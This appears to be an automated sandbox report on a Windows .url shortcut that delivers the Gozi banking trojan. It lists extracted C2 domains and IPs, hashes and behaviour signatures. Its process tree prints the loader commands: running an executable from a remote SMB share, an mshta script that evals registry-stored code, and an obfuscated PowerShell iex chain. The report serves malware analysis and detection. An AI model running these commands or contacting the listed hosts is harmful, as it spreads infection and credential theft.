Analysis
-
max time kernel
151s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
28-09-2023 13:16
Static task
static1
Behavioral task
behavioral1
Sample
Cliente.url
Resource
win7-20230831-en
General
-
Target
Cliente.url
-
Size
192B
-
MD5
78078edede0301883d16ec812fd6bc3c
-
SHA1
bb501ff7b5a6074c5a3478b1137305af1daab8cd
-
SHA256
1f4bca4ce6d93b64a82d2e3ba1d2b876f2ad455f311768922e32377f3923db8f
-
SHA512
7b9ce5672c131ce7e8e3d8857c9ce292481ec1c95c7b1243838c30be1dad2bf21b52d39bb8df3a2e11e5b089462b6ecac630ebb3d992f215bf28e2256148f2a0
Malware Config
Extracted
gozi
Extracted
gozi
5050
netsecurez.com
whofoxy.com
mimemoa.com
ntcgo.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
31.41.44.79
185.248.144.203
netsecurez.com
whofoxy.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
resource yara_rule behavioral2/memory/2984-1-0x0000000000470000-0x000000000047C000-memory.dmp dave -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 1324 set thread context of 3248 1324 powershell.exe Explorer.EXE PID 3248 set thread context of 3756 3248 Explorer.EXE RuntimeBroker.exe PID 3248 set thread context of 3988 3248 Explorer.EXE RuntimeBroker.exe PID 3248 set thread context of 4844 3248 Explorer.EXE RuntimeBroker.exe PID 3248 set thread context of 3684 3248 Explorer.EXE RuntimeBroker.exe PID 3248 set thread context of 548 3248 Explorer.EXE cmd.exe PID 3248 set thread context of 4880 3248 Explorer.EXE cmd.exe PID 548 set thread context of 1608 548 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 3 IoCs
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 1608 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Client.exepowershell.exeExplorer.EXEpid process 2984 Client.exe 2984 Client.exe 1324 powershell.exe 1324 powershell.exe 1324 powershell.exe 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3248 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 1324 powershell.exe 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 548 cmd.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
powershell.exeExplorer.EXEsvchost.exedescription pid process Token: SeDebugPrivilege 1324 powershell.exe Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeManageVolumePrivilege 2172 svchost.exe Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 3248 Explorer.EXE 3248 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3248 Explorer.EXE -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
rundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 1464 wrote to memory of 2984 1464 rundll32.exe Client.exe PID 1464 wrote to memory of 2984 1464 rundll32.exe Client.exe PID 1464 wrote to memory of 2984 1464 rundll32.exe Client.exe PID 3724 wrote to memory of 1324 3724 mshta.exe powershell.exe PID 3724 wrote to memory of 1324 3724 mshta.exe powershell.exe PID 1324 wrote to memory of 3868 1324 powershell.exe csc.exe PID 1324 wrote to memory of 3868 1324 powershell.exe csc.exe PID 3868 wrote to memory of 4640 3868 csc.exe cvtres.exe PID 3868 wrote to memory of 4640 3868 csc.exe cvtres.exe PID 1324 wrote to memory of 832 1324 powershell.exe csc.exe PID 1324 wrote to memory of 832 1324 powershell.exe csc.exe PID 832 wrote to memory of 2484 832 csc.exe cvtres.exe PID 832 wrote to memory of 2484 832 csc.exe cvtres.exe PID 1324 wrote to memory of 3248 1324 powershell.exe Explorer.EXE PID 1324 wrote to memory of 3248 1324 powershell.exe Explorer.EXE PID 1324 wrote to memory of 3248 1324 powershell.exe Explorer.EXE PID 1324 wrote to memory of 3248 1324 powershell.exe Explorer.EXE PID 3248 wrote to memory of 3756 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 3756 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 3756 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 3756 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 3988 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 3988 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 3988 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 3988 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 4844 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 4844 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 4844 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 4844 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 3684 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 3684 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 3684 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 3684 3248 Explorer.EXE RuntimeBroker.exe PID 3248 wrote to memory of 548 3248 Explorer.EXE cmd.exe PID 3248 wrote to memory of 548 3248 Explorer.EXE cmd.exe PID 3248 wrote to memory of 548 3248 Explorer.EXE cmd.exe PID 3248 wrote to memory of 4880 3248 Explorer.EXE cmd.exe PID 3248 wrote to memory of 4880 3248 Explorer.EXE cmd.exe PID 3248 wrote to memory of 4880 3248 Explorer.EXE cmd.exe PID 3248 wrote to memory of 4880 3248 Explorer.EXE cmd.exe PID 3248 wrote to memory of 548 3248 Explorer.EXE cmd.exe PID 3248 wrote to memory of 548 3248 Explorer.EXE cmd.exe PID 3248 wrote to memory of 4880 3248 Explorer.EXE cmd.exe PID 3248 wrote to memory of 4880 3248 Explorer.EXE cmd.exe PID 548 wrote to memory of 1608 548 cmd.exe PING.EXE PID 548 wrote to memory of 1608 548 cmd.exe PING.EXE PID 548 wrote to memory of 1608 548 cmd.exe PING.EXE PID 548 wrote to memory of 1608 548 cmd.exe PING.EXE PID 548 wrote to memory of 1608 548 cmd.exe PING.EXE
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Cliente.url2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
\??\UNC\62.173.146.12\Scarica\Client.exe"\\62.173.146.12\Scarica\Client.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Nodw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nodw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\304F83E1-CF18-E2AF-D964-73361DD857CA\\\OperatorAbout'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name kmkrdv -value gp; new-alias -name nrpxiw -value iex; nrpxiw ([System.Text.Encoding]::ASCII.GetString((kmkrdv "HKCU:Software\AppDataLow\Software\Microsoft\304F83E1-CF18-E2AF-D964-73361DD857CA").ClassDocument))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u2jo5d1i\u2jo5d1i.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A.tmp" "c:\Users\Admin\AppData\Local\Temp\u2jo5d1i\CSCAA9961F06BCC497FBEA57E37F96FA643.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r3exlv5m\r3exlv5m.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES162.tmp" "c:\Users\Admin\AppData\Local\Temp\r3exlv5m\CSCF840EBCFF1BD45E78D1E6A4CB6C134F6.TMP"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "\\62.173.146.12\Scarica\Client.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES162.tmpFilesize
1KB
MD5c7be5b16b7016a10f769deeb6e801b06
SHA112d541430b8af05d456de68526a4e6002ea3cb68
SHA256acc97d76236248af4a0235567fdf427d9c8bf08842512919af6444b784f73ba7
SHA512e5537d95cef53edc4330b2205f16145b4b6bac621e17d541a640314162fb97d46bf6cbb23d2d68d18383ec411cdc513fd2d32b3fbc93112b94c0085c041ede56
-
C:\Users\Admin\AppData\Local\Temp\RES2A.tmpFilesize
1KB
MD59afc5a0eaf6df6e904dc9d4d59ee084a
SHA1f030a9abe1311f26e6238549880978f4143992b1
SHA2567674be80a145a0e5398d0fe140f2b27844db13e7975298960bd66a284ac323bb
SHA51292ed23b57851e2bcdb483b6d295a14747a309ca45a7dc32e4734c83cf5b22c8f0c5c80a5b25b98cd23effd1a51059fe42723ba56ec81d2c592a598979e3e0839
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n4k23ipi.gl1.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\r3exlv5m\r3exlv5m.dllFilesize
3KB
MD509dc55dac5e6f6e4c4758b3955e0981f
SHA1018e730e86f50dc84d9ca07e71787abdb66cfe0e
SHA256b3241b8b16122772e7c072a13fd4a22978ab4ceaa1599b528c7b31620ba0aaed
SHA512362d3bb06f575c7dea5f565ee5a581594fb4d4cdc2012ef759ed67dfcdcb8f69c04d0a361aca5928ceca3e4a67fd585cbc801ca31ede91539332cdb385ded50f
-
C:\Users\Admin\AppData\Local\Temp\u2jo5d1i\u2jo5d1i.dllFilesize
3KB
MD55ca77c6e3a88971a0cec37bfa958acc8
SHA1a6a8b7bae5125f45a127008a321520fc60c80695
SHA256440dd06e99bacb619d8296f884e583a27836c49799f4911dfc991c5f4648934b
SHA512b4203cc722fbd0fd91c474807c9952a0af966ed0f6f6537d493dc14a15d7d75c0f4a13f90c3e2af26c75b898090807b4daf37f2574593c79e3e9afc9ec816266
-
\??\c:\Users\Admin\AppData\Local\Temp\r3exlv5m\CSCF840EBCFF1BD45E78D1E6A4CB6C134F6.TMPFilesize
652B
MD533637dc8aa6ff26dbf00a8702d195c18
SHA1a9ca3686de3403213a7e59e49717da393f3d60da
SHA256876019842a9a4fff22e08282788f980f65a21c038ef2207ac147f6528fde0e00
SHA5124c7a3f47db209b2021ad6dd31486f728d780678fe907bc3487f84883f7fb8e2db7b9d28b1dc41abc2c10804f5a8c1c47e9b6e400968928930fdacf8f116c7a10
-
\??\c:\Users\Admin\AppData\Local\Temp\r3exlv5m\r3exlv5m.0.csFilesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
\??\c:\Users\Admin\AppData\Local\Temp\r3exlv5m\r3exlv5m.cmdlineFilesize
369B
MD51c3e90d26ebe67ad2a04576abd9284a5
SHA1952511b5ac0b36e620f35b073c653ba9380d00d2
SHA256a77a5ec6759f03aedcb5fdd5fe9a83d4cbcd66ac0173e93763916473dbea0aed
SHA512e87bd376602494a40f79b90d6c3f7fe98ac580ae55631f134431f22b60d377a0a854195ca9a3583013e272368bfcac160eeb887a3ceee4b6109735ae3aed6db7
-
\??\c:\Users\Admin\AppData\Local\Temp\u2jo5d1i\CSCAA9961F06BCC497FBEA57E37F96FA643.TMPFilesize
652B
MD5a5ebc455c9a33186423a7e63e4a38aee
SHA150b8009d19219a4640ada7fc95a527ddffd944ca
SHA2562be760c8ed476d8d48a2a8380a209bea3ae373e3dbe6e4a20f1369321c2a6b0f
SHA512ab0fe5d2ce0a90783ed651f02af9983bb32c573bb828a36bd9d596ade182b80e8b820248030d2b3643807a7f794f18ee4731823d028b561fcb3270c5df1cde49
-
\??\c:\Users\Admin\AppData\Local\Temp\u2jo5d1i\u2jo5d1i.0.csFilesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
\??\c:\Users\Admin\AppData\Local\Temp\u2jo5d1i\u2jo5d1i.cmdlineFilesize
369B
MD5d086524cacd7fa98b3239e855ff28feb
SHA143b920ee177909a53d90f4315132c595f5c7a47b
SHA25617933d30fd20647234c8d40a1bccea39a9b8b0eccaa2445395a561cc5966ff87
SHA512456a34212c99bbc14c7e507db7e330c806018a08d23da0ab9f40ff13c6b7fb10dfdbc4fd5e407a24efb2aae2b093762fd99ac4844e7326722d21b83791b77d48
-
memory/548-103-0x000001B62F570000-0x000001B62F571000-memory.dmpFilesize
4KB
-
memory/548-100-0x000001B62F6D0000-0x000001B62F774000-memory.dmpFilesize
656KB
-
memory/548-123-0x000001B62F6D0000-0x000001B62F774000-memory.dmpFilesize
656KB
-
memory/1324-72-0x00007FF8F84B0000-0x00007FF8F8F71000-memory.dmpFilesize
10.8MB
-
memory/1324-30-0x0000017DF3150000-0x0000017DF3160000-memory.dmpFilesize
64KB
-
memory/1324-29-0x0000017DF3150000-0x0000017DF3160000-memory.dmpFilesize
64KB
-
memory/1324-28-0x00007FF8F84B0000-0x00007FF8F8F71000-memory.dmpFilesize
10.8MB
-
memory/1324-44-0x0000017DF3140000-0x0000017DF3148000-memory.dmpFilesize
32KB
-
memory/1324-23-0x0000017DF30B0000-0x0000017DF30D2000-memory.dmpFilesize
136KB
-
memory/1324-31-0x0000017DF3150000-0x0000017DF3160000-memory.dmpFilesize
64KB
-
memory/1324-58-0x0000017DF3370000-0x0000017DF3378000-memory.dmpFilesize
32KB
-
memory/1324-73-0x0000017DF3380000-0x0000017DF33BD000-memory.dmpFilesize
244KB
-
memory/1324-60-0x0000017DF3380000-0x0000017DF33BD000-memory.dmpFilesize
244KB
-
memory/1608-122-0x0000019915620000-0x00000199156C4000-memory.dmpFilesize
656KB
-
memory/1608-115-0x00000199156D0000-0x00000199156D1000-memory.dmpFilesize
4KB
-
memory/1608-114-0x0000019915620000-0x00000199156C4000-memory.dmpFilesize
656KB
-
memory/2172-124-0x0000016A622B0000-0x0000016A622C0000-memory.dmpFilesize
64KB
-
memory/2984-0-0x0000000000490000-0x000000000049F000-memory.dmpFilesize
60KB
-
memory/2984-1-0x0000000000470000-0x000000000047C000-memory.dmpFilesize
48KB
-
memory/2984-5-0x00000000023B0000-0x00000000023BF000-memory.dmpFilesize
60KB
-
memory/2984-12-0x0000000002520000-0x000000000252D000-memory.dmpFilesize
52KB
-
memory/2984-11-0x00000000005E0000-0x00000000005F3000-memory.dmpFilesize
76KB
-
memory/3248-101-0x0000000008CB0000-0x0000000008D54000-memory.dmpFilesize
656KB
-
memory/3248-63-0x0000000002E00000-0x0000000002E01000-memory.dmpFilesize
4KB
-
memory/3248-62-0x0000000008CB0000-0x0000000008D54000-memory.dmpFilesize
656KB
-
memory/3684-93-0x000001D3BBE00000-0x000001D3BBEA4000-memory.dmpFilesize
656KB
-
memory/3684-94-0x000001D3BBEB0000-0x000001D3BBEB1000-memory.dmpFilesize
4KB
-
memory/3684-121-0x000001D3BBE00000-0x000001D3BBEA4000-memory.dmpFilesize
656KB
-
memory/3756-76-0x0000016DFFEF0000-0x0000016DFFEF1000-memory.dmpFilesize
4KB
-
memory/3756-75-0x0000016E00200000-0x0000016E002A4000-memory.dmpFilesize
656KB
-
memory/3756-107-0x0000016E00200000-0x0000016E002A4000-memory.dmpFilesize
656KB
-
memory/3988-81-0x000001B66A400000-0x000001B66A4A4000-memory.dmpFilesize
656KB
-
memory/3988-116-0x000001B66A400000-0x000001B66A4A4000-memory.dmpFilesize
656KB
-
memory/3988-82-0x000001B66A3C0000-0x000001B66A3C1000-memory.dmpFilesize
4KB
-
memory/4844-120-0x0000020CEBB30000-0x0000020CEBBD4000-memory.dmpFilesize
656KB
-
memory/4844-88-0x0000020CEB3D0000-0x0000020CEB3D1000-memory.dmpFilesize
4KB
-
memory/4844-87-0x0000020CEBB30000-0x0000020CEBBD4000-memory.dmpFilesize
656KB
-
memory/4880-111-0x0000000000F20000-0x0000000000FB8000-memory.dmpFilesize
608KB
-
memory/4880-109-0x00000000007E0000-0x00000000007E1000-memory.dmpFilesize
4KB
-
memory/4880-106-0x0000000000F20000-0x0000000000FB8000-memory.dmpFilesize
608KB